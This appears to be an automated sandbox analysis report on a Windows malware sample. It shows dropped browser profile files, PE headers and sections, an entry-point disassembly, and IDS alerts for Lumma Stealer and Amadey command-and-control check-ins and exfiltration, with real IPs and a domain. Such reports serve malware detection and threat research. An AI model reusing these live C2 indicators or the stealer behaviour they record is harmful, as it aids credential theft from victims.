                                                                                                                                                                                                                                            Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                                                                            Entropy (8bit):0.035822017202226504
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:GtlstFKMu3bHCF4lstFKMu3bHCdt/T89//alEl:GtWtIMuLHCF4WtIMuLHCdZ89XuM
                                                                                                                                                                                                                                            MD5:DB59D4FBD2AB45F6BBA56AC630C4B400
                                                                                                                                                                                                                                            SHA1:80505D5F120CE29294D20BC89C456C747DB33CD7
                                                                                                                                                                                                                                            SHA-256:1FC6CC8EC9970154BA23EBDB1D2F21A4B3110D45C7DA2D6FD2858C684A25C12E
                                                                                                                                                                                                                                            SHA-512:19390DC8648A070037EC57C2DCCAD39057AA221CDA0820D72051BE4965886C7A8E6AC7525FB499C25E836EC86A10545FDBDCDB2C69D512DEFE339F1EC76CF411
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:..-.........................._...r}.h1.J...'.f...-.........................._...r}.h1.J...'.f.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                            File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                            Size (bytes):32824
                                                                                                                                                                                                                                            Entropy (8bit):0.03510695119703475
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Ol1JVCS/lIyJ0Hlga5SrV//mwl8XW3R2:Kbv/lxGlgJpuw93w
                                                                                                                                                                                                                                            MD5:CA82893AA3F2F083E8E72985196784E6
                                                                                                                                                                                                                                            SHA1:A23A598B8F1D8C8C608FF9E67018EFB730BECBDD
                                                                                                                                                                                                                                            SHA-256:C22C71A281A6B3BE32806DAB1D62AA29A9281F252F79EF5C513EA5315CA71033
                                                                                                                                                                                                                                            SHA-512:49D2CE471E1494FF034C7BAE0CB7120A5FB0EDADCE63015BF753F35ADE5D9187BB480906024FB75EBBC0A8173DD1D770C02BFD7C3BF748B92D477831C5AE87DE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:7....-...........r}.h1.JyDu.{.~..........r}.h1.J......_.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10547
                                                                                                                                                                                                                                            Entropy (8bit):5.49575168894187
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:/nTFTRR4YbBp6QLZNMGaXU6qU4rzy+/3/OYiNBw8d7Sl:LCexFNMr4yrdwc0
                                                                                                                                                                                                                                            MD5:F6B7E9E3F59CAB1A00AEE0EA68619C00
                                                                                                                                                                                                                                            SHA1:0D7EC9B7831D01AEAF0625D71B7ACD3A9A958D29
                                                                                                                                                                                                                                            SHA-256:44391566C480C06C41421D0BB7F3005111141FBF6FD9D6AE06BBC8F29C6EF4BF
                                                                                                                                                                                                                                            SHA-512:B1A6758E32A1301475D952CB8935EE11E9A0F482F671BCC876C0BA8FCCFB8E0846C1FD43E98F47A44A3D7C08C396B8AACC9C781E48D538BC9F8F4C2AB1D16A81
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10547
                                                                                                                                                                                                                                            Entropy (8bit):5.49575168894187
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:/nTFTRR4YbBp6QLZNMGaXU6qU4rzy+/3/OYiNBw8d7Sl:LCexFNMr4yrdwc0
                                                                                                                                                                                                                                            MD5:F6B7E9E3F59CAB1A00AEE0EA68619C00
                                                                                                                                                                                                                                            SHA1:0D7EC9B7831D01AEAF0625D71B7ACD3A9A958D29
                                                                                                                                                                                                                                            SHA-256:44391566C480C06C41421D0BB7F3005111141FBF6FD9D6AE06BBC8F29C6EF4BF
                                                                                                                                                                                                                                            SHA-512:B1A6758E32A1301475D952CB8935EE11E9A0F482F671BCC876C0BA8FCCFB8E0846C1FD43E98F47A44A3D7C08C396B8AACC9C781E48D538BC9F8F4C2AB1D16A81
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):90
                                                                                                                                                                                                                                            Entropy (8bit):4.194538242412464
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
                                                                                                                                                                                                                                            MD5:C4AB2EE59CA41B6D6A6EA911F35BDC00
                                                                                                                                                                                                                                            SHA1:5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
                                                                                                                                                                                                                                            SHA-256:00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
                                                                                                                                                                                                                                            SHA-512:71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}
                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):90
                                                                                                                                                                                                                                            Entropy (8bit):4.194538242412464
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
                                                                                                                                                                                                                                            MD5:C4AB2EE59CA41B6D6A6EA911F35BDC00
                                                                                                                                                                                                                                            SHA1:5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
                                                                                                                                                                                                                                            SHA-256:00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
                                                                                                                                                                                                                                            SHA-512:71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):302
                                                                                                                                                                                                                                            Entropy (8bit):3.446225435861987
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:xCtjGXXUhXUEZ+lX1CGdKUe6tE9+AQy0lH2t0:xCt84Q1CGAFD9+nVH2t0
                                                                                                                                                                                                                                            MD5:51ACCBEEBD9F35D8D8381BF6E1016A38
                                                                                                                                                                                                                                            SHA1:31B96D5B3C6257577489C67B302083292B306960
                                                                                                                                                                                                                                            SHA-256:413F0276F741190AA96C8135FEB34D6ED97AF90EFA86859F9DFB60CF04A1BFE6
                                                                                                                                                                                                                                            SHA-512:ABBB639291690D879003DB6045D99C6D59D7D7510B16DEC2AB1DA24BE5ADF15436FEE69378006220A91BF872054DE850242A203D657F553C9C1F1EBCAAF98832
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:..........L.....DP2F.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0...................@3P.........................
                                                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Entropy (8bit):6.678543007246508
                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                            File name:file.exe
                                                                                                                                                                                                                                            File size:3'279'872 bytes
                                                                                                                                                                                                                                            MD5:d75b31ba6f3bebdb12b9c28a09d444f9
                                                                                                                                                                                                                                            SHA1:80f5231691ec242eb62324bdf2986c50ae9b2ac8
                                                                                                                                                                                                                                            SHA256:e951c2f841b3ca0b3bb4ba865ab40d102a6074a4b6f74c0c10d99f6ea125c2cf
                                                                                                                                                                                                                                            SHA512:24de73a3543d2474ce6c40ec11c814361f3200b752ff165c8283628504b7bba5090e48713314fddde076518060ca18fe7043113aeed24e36e29fb07c057d77ed
                                                                                                                                                                                                                                            SSDEEP:49152:NcyRqEl5yhyZfpyqcm8consSF1nWSKiYRl7Ea+iwFCrlxbuGLfd:ZRGhyZfpyzmVtAAJZJ9+iwFCnbB7d
                                                                                                                                                                                                                                            TLSH:C8E5399AB40761CBC48A23FCD0A7CD86596D53BB0B1089C3A86D7DBD6E67CC121B7D24
                                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................
                                                                                                                                                                                                                                            Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                            Entrypoint:0x721000
                                                                                                                                                                                                                                            Entrypoint Section:.taggant
                                                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                            Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                                            jmp 00007F020CE5547Ah
                                                                                                                                                                                                                                            pminsw mm6, qword ptr [ecx]
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add cl, ch
                                                                                                                                                                                                                                            add byte ptr [eax], ah
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [ebx], cl
                                                                                                                                                                                                                                            or al, byte ptr [eax]
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax-4Dh], ah
                                                                                                                                                                                                                                            adc dl, byte ptr [eax]
                                                                                                                                                                                                                                            inc esp
                                                                                                                                                                                                                                            nop
                                                                                                                                                                                                                                            sub byte ptr [edi], cl
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            or ecx, dword ptr [edx]
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            push es
                                                                                                                                                                                                                                            add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            adc byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add al, 0Ah
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x388.rsrc
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x31fd780x10cmuiqwlw
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x31fd280x18cmuiqwlw
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                            0x10000x680000x68000012b604355affaadb466921148974ea4False0.5600867638221154data7.053445284969334IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                            .rsrc0x690000x3880x400514f5782f497fa171df6168314823de0False0.453125data5.340697973950139IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                            .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                            cmuiqwlw0x6b0000x2b50000x2b4e008d51b9673547f087b69feeca1de50ec3unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                            afwwhgey0x3200000x10000x600e99162cf1ee71ff805f9d13b7f4e8a2fFalse0.576171875data4.941119831468745IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                            .taggant0x3210000x30000x220080a392a99372de22cbfcbf28923fa843False0.060776654411764705DOS executable (COM)0.7884781681841612IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                            RT_MANIFEST0x690700x198ASCII text, with CRLF line terminators0.5808823529411765
                                                                                                                                                                                                                                            RT_MANIFEST0x692080x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                                            kernel32.dlllstrcpy
                                                                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                            EnglishUnited States
                                                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                            2024-12-09T21:07:52.600943+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.650079104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:07:52.600943+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650079104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:05.209521+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.649848185.215.113.4380TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:09.655624+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.64985931.41.244.1180TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:13.494827+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649867172.67.139.78443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:13.726517+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.649854TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:14.202655+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649867172.67.139.78443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:14.202655+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649867172.67.139.78443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:15.077061+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.649868185.215.113.4380TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:15.473267+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649873172.67.139.78443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:16.213022+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649873172.67.139.78443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:16.213022+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649873172.67.139.78443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:16.795296+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.64987431.41.244.1180TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:17.894518+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649879172.67.139.78443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:18.817215+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649879172.67.139.78443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:20.216536+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649884172.67.139.78443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:22.780336+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649891172.67.139.78443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:23.795328+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.649892185.215.113.4380TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:25.260013+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649898185.215.113.1680TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:25.344458+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649899172.67.139.78443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:28.495705+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649905172.67.139.78443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:31.671259+01002057921ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz)1192.168.2.6559411.1.1.153UDP
                                                                                                                                                                                                                                            2024-12-09T21:09:32.579782+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.649916185.215.113.4380TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:33.154989+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.649921104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:33.154989+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649921104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:34.035710+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649923185.215.113.1680TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:34.141395+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649921104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:34.141395+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649921104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:34.232365+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649924172.67.139.78443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:35.255676+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649924172.67.139.78443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:35.600959+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.649930104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:35.600959+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649930104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:36.350431+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649930104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:36.350431+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649930104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:38.000230+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.649936104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:38.000230+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649936104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:38.982442+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649936104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:40.974986+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.649942185.215.113.4380TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:41.519430+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.649943104.21.48.1443TCP
